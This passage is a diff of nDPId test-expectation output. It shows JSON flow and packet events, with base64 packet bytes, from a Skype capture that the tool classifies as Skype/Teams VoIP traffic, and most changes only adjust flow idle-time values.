-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1215,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMNRAAEAG8HbAqAEiQAQXn8hOnEl2PjrTAAAAALAC\/\/+HCAAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} 
-00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABARUhAAEAGeZjAqAEib91KMMhPnEhg80NCAAAAALAC\/\/8xegAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1213,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABA7SRAAEAGAv\/AqAEinTfrkshMnFVVB2sVAAAAALAC\/\/9GzAAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1214,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1214,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABA5x1AAEAGCPzAqAEinTfrnMhNnFpJkZ45AAAAALAC\/\/8fDgAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} 
+00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1215,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1215,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMNRAAEAG8HbAqAEiQAQXn8hOnEl2PjrTAAAAALAC\/\/+HCAAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABARUhAAEAGeZjAqAEib91KMMhPnEhg80NCAAAAALAC\/\/8xegAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1431970682972,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970682972,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2ToQAAEARSoLAqAEinTeCrzLdnEYAIsBye70C0WV2Jw2JJv9T381tb7aFs7ugTny6Jk4="} 
00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1431970682972,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970682972,"pkt":"0NQSxnP1PBXCt3IOCABFAABBmw8AAEARYEjAqAEib91NrTLdnEwALft7e78CS2barOC4bSdle3ySCU4isieKFyYrhir3D1S\/zus1mmpuRQ=="} 
00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":2,"flow_last_seen":1431970683043,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683043,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIpxVyEzh8Ob8VQdrFqASOJAqmgAAAgQFrAQCCApMYN9LPjJCqwEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":3,"flow_last_seen":1431970683044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683044,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0JNdAAEAGy1jAqAEinTfrkshMnFVVB2sW4fDm\/YAQECyBfAAAAQEICj4yQvNMYN9L"} 
-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":1431970683053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683053,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIpxayE3JOyrZSZGeOqASOJDTSQAAAgQFrAQCCApMXOO6PjJCqwEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":3,"flow_last_seen":1431970683054,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683054,"pkt":"0NQSxnP1PBXCt3IOCABFAAA01TpAAEAGGuvAqAEinTfrnMhNnFpJkZ46yTsq2oAQECwqIwAAAQEICj4yQvxMXOO6"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1431970683168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683168,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK09ABBefwKgBIpxJyE4gX59Fdj461KASOJB7AAAAAgQFrAQCCApMR9iDPjJCqwEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":1431970683168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683168,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05M1AAEAGPInAqAEiQAQXn8hOnEl2PjrUIF+fRoAQECzRaAAAAQEICj4yQ21MR9iD"} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":2,"flow_last_seen":1431970683978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970683978,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGihAAEAGpLjAqAEib91KMMhPnEhg80NCAAAAALAC\/\/8tkQAAAgQFtAEDAwUBAQgKPjJGlAAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":2,"flow_last_seen":1431970683043,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683043,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIpxVyEzh8Ob8VQdrFqASOJAqmgAAAgQFrAQCCApMYN9LPjJCqwEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":3,"flow_last_seen":1431970683044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683044,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0JNdAAEAGy1jAqAEinTfrkshMnFVVB2sW4fDm\/YAQECyBfAAAAQEICj4yQvNMYN9L"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":1431970683053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683053,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIpxayE3JOyrZSZGeOqASOJDTSQAAAgQFrAQCCApMXOO6PjJCqwEDAwk="} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":3,"flow_last_seen":1431970683054,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683054,"pkt":"0NQSxnP1PBXCt3IOCABFAAA01TpAAEAGGuvAqAEinTfrnMhNnFpJkZ46yTsq2oAQECwqIwAAAQEICj4yQvxMXOO6"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1431970683168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683168,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK09ABBefwKgBIpxJyE4gX59Fdj461KASOJB7AAAAAgQFrAQCCApMR9iDPjJCqwEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":1431970683168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683168,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05M1AAEAGPInAqAEiQAQXn8hOnEl2PjrUIF+fRoAQECzRaAAAAQEICj4yQ21MR9iD"} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":2,"flow_last_seen":1431970683978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970683978,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGihAAEAGpLjAqAEib91KMMhPnEhg80NCAAAAALAC\/\/8tkQAAAgQFtAEDAwUBAQgKPjJGlAAAAAAEAgAA"} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1431970683987,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683987,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8i9IAAEARpC3AqAEinTfrrzLdnFcAKG0ve8ECvWqBesxtVN\/+FF8A8FJFXO0bTxFAGhtLbx9IUYU="} 00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -747,23 +747,23 @@ 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1431970683987,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683987,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PqwAAEARIpXAqAEiQAQXqjLdnEsAIM3ke8UC93ejJq9SbNcOBlZBFwBC35pf1nt9"} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":3,"flow_last_seen":1431970684268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684268,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+Rv3UowwKgBIpxIyE81se9IYPNDQ6ASOJCdPQAAAgQFrAQCCApNifogPjJCqwEDAwk="} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1260,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJbZAAEAGym3AqAEinTfrkshQAbtIMwlhAAAAALAC\/\/9JqAAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} 
-00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1261,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABATSFAAEAGovjAqAEinTfrnMhRAbsdDADVAAAAALAC\/\/99UAAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1262,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABA0\/xAAEAGTU7AqAEiQAQXn8hSAbvNFjtFAAAAALAC\/\/\/EBQAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1263,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABAs0xAAEAGC5TAqAEib91KMMhTAbtJAhNrAAAAALAC\/\/8NiQAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} 
